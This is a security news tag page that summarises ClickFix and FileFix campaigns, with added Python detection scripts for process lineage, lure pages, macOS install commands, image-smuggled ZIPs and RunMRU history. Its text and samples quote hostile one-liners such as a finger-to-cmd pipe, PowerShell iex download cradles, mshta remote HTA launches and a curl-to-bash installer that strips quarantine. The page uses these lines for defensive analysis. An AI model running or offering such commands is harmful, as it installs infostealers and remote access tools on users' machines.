All news with #clickfix tag

Mon, November 17, 2025

EVALUSION ClickFix Campaign Delivers Amatera, NetSupport

🔒 Researchers identified a ClickFix-based EVALUSION campaign deploying Amatera Stealer and NetSupport RAT, observed in November 2025. The campaign abuses the Windows Run dialog and mshta.exe to launch a PowerShell script that downloads a .NET DLL hosted on MediaFire; the Amatera DLL, packed with PureCrypter, is injected into MSBuild.exe to exfiltrate data. eSentire highlights Amatera's WoW64 SysCalls evasion and conditional NetSupport deployment when domain membership or valuable files are detected.

Sat, November 15, 2025

Decades-Old Finger Protocol Used to Deliver ClickFix Malware

🛡️ Researchers warn the decades-old Finger protocol is being repurposed in ClickFix-style campaigns to fetch remote commands and execute them on Windows systems. Attackers social-engineer victims into running batch commands such as finger root@finger.nateams[.]com | cmd, piping remote output directly into cmd.exe. Observed chains create randomly named folders, copy and rename curl.exe, download a ZIP disguised as a PDF, extract a Python malware package and launch it via pythonw.exe. Blocking outbound TCP port 79 is the primary mitigation to prevent systems from connecting to remote Finger daemons.

Mon, November 10, 2025

FileFix: New File Explorer Social-Engineering Threat

🔒 FileFix is a social-engineering technique that tricks users into pasting a malicious command into the Windows File Explorer address bar instead of the Run dialog. Attackers hide a long payload before a benign-looking file path using leading spaces so only the harmless path is visible, then invoke a PowerShell script (for example via conhost.exe) to retrieve and run malware. Defenses emphasize robust endpoint protection and ongoing employee awareness training, since restricting the Run dialog alone does not cover the File Explorer path.
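The three chains above (Run dialog to mshta.exe or PowerShell, finger output piped into cmd.exe, and the whitespace-padded FileFix command entered through File Explorer) all leave a recognisable parent/child process pattern. The following detection logic is an added example written for this page, not code from any of the vendors cited; it runs over constructed Sysmon-style process-creation records, and the hostnames, paths and rule wording are assumptions chosen for illustration.

```python
"""Flag process-creation events whose lineage matches ClickFix, FileFix and
finger-based command delivery. Events are constructed Sysmon-style records,
not real telemetry."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    parent_image: str   # image path of the parent process
    image: str          # image path of the new process
    cmdline: str


SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe", "conhost.exe"}
URL_RE = re.compile(r"https?://", re.I)
# Signs that a one-liner pulls or unpacks code rather than running a local script
REMOTE_OR_ENCODED_RE = re.compile(
    r"https?://|(^|\s)-e(nc|ncodedcommand)?\b|\biex\b|invoke-expression|frombase64string", re.I)
# FileFix: a long run of whitespace (optionally a PowerShell '#' comment) hiding a benign path
PADDED_PATH_RE = re.compile(r"\s{10,}#?\s*[a-z]:\\", re.I)
# finger user@host | cmd
FINGER_PIPE_RE = re.compile(r"\bfinger(\.exe)?\s+\S+@\S+\s*\|", re.I)
PROJECT_FILE_RE = re.compile(r"\.(sln|proj|csproj|vbproj|vcxproj)\b", re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> list[str]:
    """Return the list of ClickFix-style patterns the event matches (empty if none)."""
    parent, child, cl = basename(ev.parent_image), basename(ev.image), ev.cmdline
    hits = []
    # Run dialog and File Explorer address bar both make explorer.exe the parent
    if parent == "explorer.exe" and child in SCRIPT_HOSTS and REMOTE_OR_ENCODED_RE.search(cl):
        hits.append("explorer.exe spawned a script host with a remote or encoded payload")
    if PADDED_PATH_RE.search(cl):
        hits.append("whitespace-padded command hiding a benign path (FileFix)")
    if FINGER_PIPE_RE.search(cl):
        hits.append("finger output piped into a shell")
    if child == "mshta.exe" and URL_RE.search(cl):
        hits.append("mshta.exe launched with a remote URL")
    # Amatera-style chain: PowerShell starts MSBuild.exe with nothing to build
    if parent in {"powershell.exe", "pwsh.exe"} and child == "msbuild.exe" and not PROJECT_FILE_RE.search(cl):
        hits.append("MSBuild.exe started from PowerShell without a project file (injection host)")
    return hits


def scan(events) -> dict:
    """Map pid -> matched patterns for every event that matched at least one."""
    return {ev.pid: h for ev in events if (h := classify(ev))}


# Constructed sample events; hostnames use the reserved .invalid TLD.
SAMPLE_EVENTS = [
    ProcEvent(100, r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
              "mshta https://captcha-check.invalid/verify.hta"),
    ProcEvent(101, r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
              'cmd /c "finger root@finger.example.invalid | cmd"'),
    ProcEvent(102, r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell -w hidden -c "iex (iwr https://meta-support.invalid/p)"' + " " * 40
              + r"# C:\company\internal-secure\filedrive\HRPolicy.docx"),
    ProcEvent(103, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
              r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"),
    # Benign: a scheduled task running a local script, and explorer opening Notepad
    ProcEvent(200, r"C:\Windows\System32\svchost.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"),
    ProcEvent(201, r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad"),
]

if __name__ == "__main__":
    for pid, hits in scan(SAMPLE_EVENTS).items():
        print(pid, hits)
```

The explorer.exe parent is the key signal shared by Run dialog and address-bar entry; the padded-path and finger rules catch the variants that omit a URL from the visible command, and the MSBuild rule is deliberately narrow so that a developer build (which always passes a project or solution file) is not flagged.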

Mon, November 10, 2025

Acronis on FileFix, SideWinder and Shadow Vector Campaigns

🔍 Acronis TRU describes practical VirusTotal hunting techniques used to track the FileFix ClickFix variant, the long-running SideWinder actor, and the Shadow Vector SVG campaign targeting Colombian users. Using Livehunt, content-based YARA rules, VT Diff, and metadata pivoting, analysts located clipboard-based web payloads, document exploits (CVE-2017-0199 and CVE-2017-11882), and judicial-themed SVG decoys. The post emphasizes iterative rule tuning, retrohunt for timelines, and infrastructure pivots that convert fragmented indicators into actionable intelligence.

Thu, November 6, 2025

ClickFix attacks add multi-OS support, videos, timers

🔒 ClickFix campaigns have evolved to include embedded video tutorials, an automated OS detector, and a countdown timer to pressure victims into executing pasted commands. Researchers at Push Security observed fake Cloudflare CAPTCHA pages that auto-copy malicious commands to the clipboard and adapt instructions for Windows, macOS, or Linux. Attackers promote these pages via malvertising, SEO poisoning, and compromised sites, then deliver varying payloads such as remote HTA files run through mshta.exe and PowerShell scripts. Users are strongly advised never to paste and run terminal commands from unknown web prompts.
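The page-side traits described in this item and in the Acronis hunting write-up above (clipboard write, keyboard instructions, CAPTCHA wording, OS detection, timer, mobile blocking) can be scored statically from a saved HTML file. The script below is an added example for this page, not Push Security's or Acronis' tooling; the indicator names, weights, threshold and the two sample pages are assumptions made here.

```python
"""Static triage of a saved web page for ClickFix indicators: clipboard
hijacking, Run-dialog instructions, CAPTCHA lure text, OS detection,
countdown timers and mobile blocking. The two pages below are constructed."""
import re

# Each indicator carries a weight; the verdict needs both a clipboard write
# and keyboard instructions plus enough supporting signals.
INDICATORS = {
    "clipboard_write": (2, re.compile(
        r"navigator\.clipboard\.writeText|execCommand\(\s*['\"]copy['\"]\s*\)|clipboardData\.setData", re.I)),
    "run_dialog_steps": (3, re.compile(
        r"win(dows)?\s*(key)?\s*\+\s*r\b|ctrl\s*\+\s*v\b|press\s+enter", re.I)),
    "captcha_lure": (2, re.compile(
        r"verify (you are|you're) human|i'?m not a robot|ray id|checking your browser", re.I)),
    "os_detection": (1, re.compile(r"navigator\.(platform|userAgent|userAgentData)")),
    "countdown_timer": (1, re.compile(
        r"setInterval[\s\S]{0,300}\b(countdown|timer|seconds)\b|\b(countdown|timer)\b[\s\S]{0,300}setInterval", re.I)),
    # a JS regex literal testing the user agent for phones, used to hide the lure from mobile users
    "mobile_block": (1, re.compile(r"/[^/\n]*(android|iphone)[^/\n]*/i", re.I)),
}
THRESHOLD = 6

WRITE_ARG_RE = re.compile(r"writeText\(\s*([^)]*?)\s*\)", re.S)
STRING_LIT_RE = re.compile(r"""^(['"`])(.*)\1$""", re.S)


def extract_payload(html: str):
    """Recover the string handed to navigator.clipboard.writeText, following one
    level of variable indirection; returns None when it is built dynamically."""
    m = WRITE_ARG_RE.search(html)
    if not m:
        return None
    arg = m.group(1).strip()
    lit = STRING_LIT_RE.match(arg)
    if lit:
        return lit.group(2)
    if re.fullmatch(r"[A-Za-z_$][\w$]*", arg):  # plain identifier: look up its literal assignment
        decl = re.search(r"(?:var|let|const)\s+%s\s*=\s*(['\"`])(.*?)\1" % re.escape(arg), html, re.S)
        if decl:
            return decl.group(2)
    return None


def analyze(html: str) -> dict:
    matched = [name for name, (_, rx) in INDICATORS.items() if rx.search(html)]
    score = sum(INDICATORS[n][0] for n in matched)
    verdict = ("likely ClickFix" if score >= THRESHOLD and
               {"clipboard_write", "run_dialog_steps"} <= set(matched) else "no ClickFix pattern")
    return {"score": score, "indicators": matched, "verdict": verdict, "payload": extract_payload(html)}


# Constructed lure page modelled on the traits described above (hostname is .invalid).
CLICKFIX_PAGE = """<html><body>
<h2>Verify you are human</h2><p>Complete the steps below. Ray ID: 8a1b</p>
<ol><li>Press Windows key + R</li><li>Press Ctrl + V</li><li>Press Enter</li></ol>
<p>Time remaining: <span id="timer">60</span> seconds</p><button id="verify">Verify</button>
<script>
if (/android|iphone/i.test(navigator.userAgent)) { document.body.innerHTML = 'Open on desktop'; }
var os = navigator.platform.indexOf('Win') === 0 ? 'win' : 'other';
var cmd = 'powershell -w hidden -c "iex (iwr https://captcha-check.invalid/v)"';
document.getElementById('verify').onclick = function () { navigator.clipboard.writeText(cmd); };
var left = 60; setInterval(function () { left--; document.getElementById('timer').textContent = left; }, 1000);
</script></body></html>"""

# Constructed benign page: a documentation "copy snippet" button also writes the clipboard.
BENIGN_PAGE = """<html><body><pre id="snippet">pip install requests</pre>
<button id="copy">Copy</button>
<script>
document.getElementById('copy').onclick = function () {
  navigator.clipboard.writeText(document.getElementById('snippet').textContent);
};
</script></body></html>"""

if __name__ == "__main__":
    print(analyze(CLICKFIX_PAGE))
    print(analyze(BENIGN_PAGE))
```

A clipboard write on its own is common on legitimate sites (the benign page scores 2), which is why the verdict also requires the keyboard-shortcut instructions; the payload extractor gives the analyst the actual command to pivot on without executing anything.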

Wed, October 22, 2025

PhantomCaptcha ClickFix Attack Targets Ukraine Relief Orgs

🛡️ A one-day spearphishing campaign named PhantomCaptcha targeted Ukrainian regional government officials and multiple war-relief organizations on October 8, using malicious PDFs that linked to a fake Zoom domain and impersonated the President’s Office. According to SentinelLABS, the operation used a fake Cloudflare CAPTCHA to trick victims into copying and pasting a token into the Windows Command Prompt, which executed a PowerShell downloader and deployed a WebSocket RAT. The lightweight RAT provided remote command execution and data exfiltration capabilities, and researchers found follow-on activity delivering spyware-laced Android APKs to users in Lviv.

Sun, October 19, 2025

TikTok Videos Push Infostealers via ClickFix Activation Scams

🔒 Cybercriminals are using TikTok videos disguised as free activation guides for software such as Windows, Adobe, Spotify, and Discord to distribute info‑stealing malware via a ClickFix technique. The videos instruct users to run a short PowerShell command that fetches a script from slmgr.win, which then downloads a variant of Aura Stealer and an additional payload from Cloudflare Pages. Victims should assume credentials are compromised, reset passwords, and avoid running copied commands in shells or terminal windows.

Sat, October 18, 2025

Google Ads Promote Fake Homebrew, LogMeIn, TradingView Sites

🚨 Researchers uncovered a malvertising campaign that uses Google Ads to surface convincing fake Homebrew, LogMeIn, and TradingView download sites targeting macOS developers. The pages prompt victims to copy a curl command into Terminal, but the clipboard actually holds a base64-encoded command that decodes to a download of an install.sh payload and runs it. That script removes quarantine flags, bypasses Gatekeeper, and delivers infostealers that check for analysis environments before executing. Operators deploy AMOS and Odyssey, which harvest browsers, wallets, and credentials; users are urged not to paste unknown commands into Terminal.

Wed, October 8, 2025

New FileFix Variant Uses Cache Smuggling to Evade Security

⚠️ A new FileFix variant uses cache smuggling to deliver a malicious ZIP via Chrome's disk cache while impersonating a Fortinet VPN Compliance Checker, tricking victims into pasting a crafted path into File Explorer. The embedded PowerShell command extracts a hidden ZIP from cached image files, writes a ComplianceChecker.zip and launches an executable, enabling execution without obvious downloads. Security firms report rapid abuse by ransomware and info-stealer operators and advise training users never to paste clipboard content into OS dialogs.

Wed, October 8, 2025

IUAM ClickFix Generator: Commoditizing Click-to-Run Phishing

🛡️ Unit 42 describes the IUAM ClickFix Generator, a phishing kit that automates creation of ClickFix-style pages which coerce victims into pasting and executing attacker-supplied commands. The kit creates OS-aware, highly customizable pages with clipboard injection, obfuscation, and mobile blocking to deliver infostealers and RATs such as DeerStealer and Odyssey. Unit 42 observed real campaigns, shared developer artifacts, and recommends user education and technical controls to block domains, IPs, and malware indicators.

Mon, September 22, 2025

Fake macOS apps on GitHub spread Atomic (AMOS) malware

⚠️ LastPass warns of a macOS campaign that uses fraudulent GitHub repositories to impersonate popular apps and trick users into running Terminal commands. The fake installers deliver the Atomic (AMOS) info‑stealer via a ClickFix workflow: a curl command decodes a base64 URL and downloads an install.sh payload to /tmp. Attackers rely on SEO and many disposable accounts to evade takedowns and boost search rankings. Users should only install macOS software from official vendor sites and avoid pasting unknown commands into Terminal.
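Both macOS items above (the Google Ads lures and the GitHub repositories) hinge on the same trick: the pasted command carries a base64 blob that decodes to the real download, and the fetched install.sh strips quarantine and probes for analysis VMs. The triage script below is an added example for this page, not LastPass' or any vendor's tool; the base64 extraction is generic, while the indicator regexes, the sample command and the sample install.sh are constructed here for illustration.

```python
"""Triage for a macOS ClickFix paste: pull out base64 blobs from the command,
decode the ones that are text, and flag dangerous behaviour in the decoded
content and in any install.sh that it fetches. All sample input is constructed."""
import base64
import binascii
import re

# Long runs of base64 characters; URL paths can match too, but those fail to decode as text.
B64_BLOB_RE = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")

# Behaviours of AMOS/Odyssey-style installers; the labels are names chosen here.
INDICATORS = {
    "pipe_to_shell": re.compile(r"\|\s*(ba|z)?sh\b"),
    "download_to_tmp": re.compile(r"\bcurl\b[^\n|]*?(-o\s*/tmp/|/tmp/)"),
    "quarantine_removal": re.compile(r"xattr\s+(-d\s+com\.apple\.quarantine|-c(r)?\b)"),
    "gatekeeper_disable": re.compile(r"spctl\s+--master-disable|--global-disable"),
    "password_prompt": re.compile(r"osascript[^\n]*(display dialog|with hidden answer)"),
    "vm_check": re.compile(r"hw\.model|ioreg[^\n]*(VMware|VirtualBox|Parallels)|sysctl[^\n]*machdep", re.I),
}


def decode_blobs(text: str) -> list[str]:
    """Return printable decodings of every base64 blob found in text (binary output is skipped)."""
    out = []
    for blob in B64_BLOB_RE.findall(text):
        try:
            raw = base64.b64decode(blob, validate=True)
        except binascii.Error:
            continue  # not valid base64 (bad length or characters)
        try:
            decoded = raw.decode("ascii")
        except UnicodeDecodeError:
            continue  # decodes to binary, not a command
        if all(c.isprintable() or c in "\n\t\r" for c in decoded):
            out.append(decoded)
    return out


def triage(command: str, script: str = "") -> dict:
    """Decode the pasted command, then scan it, its decoded stages and an optional
    fetched script for the indicator patterns."""
    decoded = decode_blobs(command)
    corpus = "\n".join([command, *decoded, script])
    found = [name for name, rx in INDICATORS.items() if rx.search(corpus)]
    return {"decoded": decoded, "indicators": found,
            "verdict": "hostile" if found else "no indicators"}


# Constructed sample: the visible command hides its real stage inside base64.
STAGE_COMMAND = "curl -fsSL https://brew-install.invalid/install.sh -o /tmp/install.sh && bash /tmp/install.sh"
SAMPLE_COMMAND = 'echo "%s" | base64 -d | bash' % base64.b64encode(STAGE_COMMAND.encode()).decode()

# Constructed install.sh with the behaviours described in the reports above.
SAMPLE_INSTALL_SH = """#!/bin/bash
sysctl -n hw.model | grep -qi virtual && exit 0
curl -fsSL https://brew-install.invalid/Brew.app.zip -o /tmp/Brew.app.zip
unzip -q /tmp/Brew.app.zip -d /tmp
xattr -d com.apple.quarantine /tmp/Brew.app
PW=$(osascript -e 'display dialog "Enter your password" default answer "" with hidden answer')
open /tmp/Brew.app
"""

if __name__ == "__main__":
    print(triage(SAMPLE_COMMAND))
    print(triage(SAMPLE_COMMAND, SAMPLE_INSTALL_SH))
```

Run it on the clipboard contents before anything is pasted into Terminal: the decoded stage shows where the download really goes, and the install.sh scan shows which of the quarantine, Gatekeeper, password-prompt and VM-check behaviours are present.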

Wed, September 17, 2025

Evolving ClickFix Variants Lead to MetaStealer Deployments

🔍 Huntress analysts observed an uptick in attacks that combine classic ClickFix social engineering with more advanced deployment techniques over the past fifteen business days. A fake AnyDesk installer used a Cloudflare Turnstile lure that opened Windows File Explorer via the search-ms protocol to deliver an LNK payload disguised as a PDF and install an MSI that dropped MetaStealer. Separately, operators deployed Cephalus ransomware using DLL sideloading through the legitimate SentinelOne host binary, illustrating evolving tradecraft that mixes manual user interaction and technical evasion.

Tue, September 16, 2025

FileFix Steganography Attack Drops StealC Infostealer

🛡️ A new FileFix campaign impersonates Meta support to trick users into pasting a disguised PowerShell command into the File Explorer address bar, which then downloads and executes malware. The attackers hide a second-stage script and encrypted binaries inside a seemingly benign JPG hosted on Bitbucket using steganography. The final payload is the StealC infostealer, designed to harvest browser credentials, messaging logins, crypto wallets, cloud keys and more. Security vendor Acronis observed multiple evolving variants over a two-week period and urges user education on these novel ClickFix/FileFix tactics.
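This item and the cache-smuggling FileFix variant above both rely on an image file that secretly carries an archive: in one case a ZIP pulled out of Chrome's disk cache, in the other a second stage inside a JPG on Bitbucket. The carver below is an added example for this page, not code from Acronis or any other vendor; it builds a fake JPEG with an appended ZIP in memory (file names and contents are placeholders chosen here) and shows how to locate the real archive start while ignoring a decoy signature inside the image.

```python
"""Carve a ZIP archive that has been appended to (or hidden inside) an image
file, as in cache-smuggling and image-steganography FileFix chains. The sample
image and archive below are constructed in memory; nothing is fetched."""
import io
import zipfile

ZIP_LOCAL_HDR = b"PK\x03\x04"
JPEG_SOI, JPEG_EOI = b"\xff\xd8", b"\xff\xd9"


def carve_zips(blob: bytes) -> list[dict]:
    """Return every offset at which a complete ZIP archive begins, with its file list."""
    found, start = [], 0
    while (off := blob.find(ZIP_LOCAL_HDR, start)) != -1:
        start = off + 1
        try:
            zf = zipfile.ZipFile(io.BytesIO(blob[off:]))
            # zipfile tolerates leading junk and shifts header offsets to compensate;
            # the true archive start is the offset where the first entry sits at 0.
            if zf.infolist() and zf.infolist()[0].header_offset == 0 and zf.testzip() is None:
                found.append({"offset": off,
                              "after_image_end": blob.rfind(JPEG_EOI, 0, off) != -1,
                              "names": zf.namelist(),
                              "sizes": {i.filename: i.file_size for i in zf.infolist()}})
        except (zipfile.BadZipFile, OSError):
            continue  # a stray PK signature with no archive behind it
    return found


def extract_embedded(blob: bytes, offset: int) -> dict[str, bytes]:
    """Read the members of the archive starting at offset into memory (no files written)."""
    with zipfile.ZipFile(io.BytesIO(blob[offset:])) as zf:
        return {name: zf.read(name) for name in zf.namelist()}


# Constructed "image": JFIF header, padding, a decoy PK signature that is not an
# archive, more padding, then the JPEG end-of-image marker.
JPEG_STUB = (JPEG_SOI + b"\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 64
             + b"PK\x03\x04not-an-archive" + b"\x00" * 64 + JPEG_EOI)


def build_sample() -> bytes:
    """Append a small constructed archive to the image stub (placeholder member contents)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("ComplianceChecker/ComplianceChecker.exe", b"MZ-placeholder-not-a-real-pe")
        zf.writestr("ComplianceChecker/run.bat", b"@echo off\r\nstart ComplianceChecker.exe\r\n")
    return JPEG_STUB + buf.getvalue()


SAMPLE_IMAGE = build_sample()

if __name__ == "__main__":
    for hit in carve_zips(SAMPLE_IMAGE):
        print(hit)
```

The after_image_end flag is the cheap tell for a cached "image" that is really a carrier: a well-formed JPEG ends at the EOI marker, so any ZIP structure found beyond it was put there on purpose. The same scan applied to a browser cache directory finds the smuggled ComplianceChecker.zip-style payload without running the PowerShell that the lure asks the victim to paste.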

Tue, September 16, 2025

Webinar: Securing the Modern Web Edge from Browser Threats

🔒 On September 29 at 12:00 PM ET, BleepingComputer and SC Media will host a live webinar featuring browser security experts from Push Security to examine how modern web browsers have become a primary enterprise attack surface. The session will cover malicious and shadow extensions, session token theft, OAuth abuse, and emerging ClickFix and FileFix techniques, plus mitigation strategies. Attendees will learn practical detection and response approaches to protect SaaS sessions, restore visibility at the web edge, and close gaps missed by traditional endpoint and identity controls.

Thu, August 21, 2025

ClickFix Campaign Delivers CORNFLAKE.V3 Backdoor via Web

🛡️ Mandiant observed a campaign using the ClickFix social-engineering lure to trick victims into copying and running PowerShell commands via the Windows Run dialog; the initial-access operator behind it is tracked as UNC5518. That access is monetized and used by other groups to deploy a versatile backdoor, CORNFLAKE.V3, which exists in PHP and JavaScript forms. CORNFLAKE.V3 supports HTTP-based payload execution, Cloudflare-tunneled proxying and registry persistence; researchers recommend disabling the Run dialog where possible, tightening PowerShell execution policies, and increasing logging and user training to mitigate the risk.
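Commands typed into the Run dialog are recorded in the RunMRU registry key, so on a suspected host the pasted ClickFix one-liner is usually still there after the fact. The parser below is an added example for this page, not Mandiant's tooling; the key path and the `\1` suffix and MRUList ordering are the documented RunMRU layout, while the sample values and the flag heuristics are constructed here.

```python
"""Parse the Run dialog history (RunMRU) exported from a suspect host and flag
entries that look like pasted ClickFix one-liners. The registry values below are
constructed; real ones live under
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU."""
import re

# Each data value is the typed command with a literal "\1" suffix; MRUList orders
# the value names, most recent first.
SAMPLE_RUNMRU = {
    "MRUList": "dbca",
    "a": r"notepad\1",
    "b": r"\\fileserver\share\1",
    "c": r"mshta https://captcha-check.invalid/verify.hta\1",
    "d": r'powershell -w hidden -c "iex (iwr https://meta-support.invalid/p)"\1',
}

SUSPICIOUS = [
    ("remote url", re.compile(r"https?://", re.I)),
    ("script host", re.compile(
        r"\b(mshta|powershell|pwsh|wscript|cscript|certutil|bitsadmin|curl|finger)(\.exe)?\b", re.I)),
    ("hidden window", re.compile(r"-w(indowstyle)?\s+hidden", re.I)),
    ("in-memory execution", re.compile(r"\biex\b|invoke-expression|frombase64string|-e(nc|ncodedcommand)?\b", re.I)),
]


def parse_runmru(values: dict) -> list[dict]:
    """Return entries in MRU order (most recent first) with the trailing '\\1' removed."""
    order = values.get("MRUList", "")
    entries = []
    for rank, letter in enumerate(order):
        data = values.get(letter)
        if data is None:
            continue  # MRUList can reference a value that was deleted
        cmd = data[:-2] if data.endswith(r"\1") else data
        flags = [label for label, rx in SUSPICIOUS if rx.search(cmd)]
        entries.append({"rank": rank, "value": letter, "command": cmd, "flags": flags})
    return entries


def suspicious_entries(values: dict) -> list[dict]:
    """Only the entries that tripped at least one heuristic."""
    return [e for e in parse_runmru(values) if e["flags"]]


if __name__ == "__main__":
    for e in suspicious_entries(SAMPLE_RUNMRU):
        print(e["rank"], e["value"], e["flags"], e["command"])
```

Feed it the values from a `reg export` or a registry hive parsed offline; the rank tells you how recently the entry was used relative to the others, which lines the pasted command up against the process-creation timeline.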
